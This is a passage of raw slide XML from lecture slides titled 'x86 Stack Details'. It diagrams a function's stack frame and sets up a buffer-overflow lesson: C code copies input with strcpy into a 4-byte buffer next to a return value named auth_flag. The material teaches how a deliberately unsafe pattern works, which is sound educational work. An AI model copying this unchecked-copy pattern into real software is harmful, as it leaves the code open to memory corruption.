          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Shape 435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Shape 436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="437" name="Shape 437"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603675" y="2884725"/>
            <a:ext cx="4011000" cy="330300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="2894000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="439" name="Shape 439"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="438" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="3047750"/>
            <a:ext cx="212700" cy="39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Shape 444"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Shape 445"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buf2 will get pushed onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Shape 448"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="449" name="Shape 449"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1603675" y="2853250"/>
            <a:ext cx="4160400" cy="251700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="2513000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="451" name="Shape 451"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="450" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="2666750"/>
            <a:ext cx="212700" cy="39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Shape 456"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now lets see how data gets written onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with a strcpy(buf2, buf), where buf2 ="AAAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
